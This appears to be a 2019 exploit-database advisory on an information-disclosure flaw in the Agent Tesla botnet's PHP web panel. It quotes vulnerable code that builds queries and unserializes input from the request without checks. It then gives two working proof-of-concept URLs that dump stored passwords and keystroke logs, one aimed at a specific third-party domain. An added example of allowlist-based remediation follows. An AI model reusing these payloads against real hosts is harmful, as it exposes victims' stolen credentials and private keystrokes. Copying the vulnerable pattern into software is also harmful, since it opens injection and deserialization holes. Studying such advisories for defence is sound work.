Agent Tesla Botnet - Information Disclosure
2019-04-30 18:05:12
################################
# Exploit Title: Agent Tesla Botnet - Information Disclosure Vulnerability
# Google Dork: n/a
# Date: 26/11/2018
# Exploit Author: n4pst3r
# Vendor Homepage: unkn0wn
# Software Link: http://www.agenttesla.com/ ¡ Down !
# Version: unkn0wn
# Tested on: Windows 10, debian 7
# CVE : n/a
# Greetz: Shell.root, Griever, Telibles
################################
# Vuln-Code: http://127.0.0.1/WebPanel/server_side/scripts/server_processing.php
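// Table name is taken directly from the request
$table = $_GET['table'];
// Table's primary key, also taken from the request
$primaryKey = $_GET['primary'];
// Optional WHERE clause, base64-decoded from the request
if (isset($_GET['where'])) {
    $where = base64_decode($_GET['where']);
} else {
    $where = "";
}
// Column list is unserialized from request data
$idArray = unserialize(urldecode($_GET['clmns']));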
################################
PoC Extract full passwords:
http://127.0.0.1/WebPanel/server_side/scripts/server_processing.php?table=passwords&primary=password_id&clmns=a:6:{i:0;a:2:{s:2:"db";s:11:"server_time";s:2:"dt";s:11:"server_time";}i:1;a:2:{s:2:"db";s:7:"pc_name";s:2:"dt";s:7:"pc_name";}i:2;a:2:{s:2:"db";s:6:"client";s:2:"dt";s:6:"client";}i:3;a:2:{s:2:"db";s:4:"host";s:2:"dt";s:4:"host";}i:4;a:2:{s:2:"db";s:8:"username";s:2:"dt";s:8:"username";}i:5;a:2:{s:2:"db";s:3:"pwd";s:2:"dt";s:3:"pwd";}}
PoC Extract full Keystrokes:
http://etvidanueva.com/photos/images/WebPanel/server_side/scripts/server_processing.php?table=logs&primary=log_id&clmns=a:6:{i:0;a:2:{s:2:"db";s:6:"log_id";s:2:"dt";s:6:"log_id";}i:1;a:2:{s:2:"db";s:11:"server_time";s:2:"dt";s:11:"server_time";}i:2;a:2:{s:2:"db";s:4:"hwid";s:2:"dt";s:4:"hwid";}i:3;a:2:{s:2:"db";s:7:"pc_name";s:2:"dt";s:7:"pc_name";}i:4;a:2:{s:2:"db";s:3:"log";s:2:"dt";s:3:"log";}i:5;a:2:{s:2:"db";s:9:"ip_addres";s:2:"dt";s:9:"ip_addres";}}
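The root cause in the Vuln-Code above is that the table, primary key, column list and WHERE clause all come from the request, and the column list goes through unserialize(). As an added example (not part of the original advisory or the panel's code), this is how an endpoint of this shape can resolve those values from a server-side allowlist instead; the view names, column names, `resolve_view` and the `user_id` session key are hypothetical.

```php
<?php
// Added example, not from the advisory. The views and columns below are
// hypothetical placeholders for an application's own schema.
declare(strict_types=1);

const VIEWS = [
    'orders' => ['key' => 'order_id', 'columns' => ['order_id', 'created_at', 'status']],
    'items'  => ['key' => 'item_id',  'columns' => ['item_id', 'name', 'price']],
];

// Map request parameters onto a fixed table, key and column list.
function resolve_view(array $query): array
{
    $name = $query['view'] ?? '';
    if (!is_string($name) || !array_key_exists($name, VIEWS)) {
        throw new InvalidArgumentException('unknown view');
    }
    $view = VIEWS[$name];

    // Columns arrive as a JSON list of names, never as serialized PHP.
    $raw = $query['columns'] ?? '[]';
    $requested = is_string($raw) ? json_decode($raw, true) : null;
    if (!is_array($requested)) {
        throw new InvalidArgumentException('columns must be a JSON array');
    }
    foreach ($requested as $col) {
        if (!is_string($col) || !in_array($col, $view['columns'], true)) {
            throw new InvalidArgumentException('column not allowed');
        }
    }
    $columns = $requested ? array_values($requested) : $view['columns'];
    return ['table' => $name, 'key' => $view['key'], 'columns' => $columns];
}

session_start();
if (empty($_SESSION['user_id'])) {   // assumed session key, set at login
    http_response_code(403);
    exit;
}
try {
    $view = resolve_view($_GET);
} catch (InvalidArgumentException $e) {
    http_response_code(400);
    exit;
}
// $view now holds only allowlisted identifiers. Any filter value from the
// request is bound as a prepared-statement parameter, never concatenated.
```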
Fixes
No fixes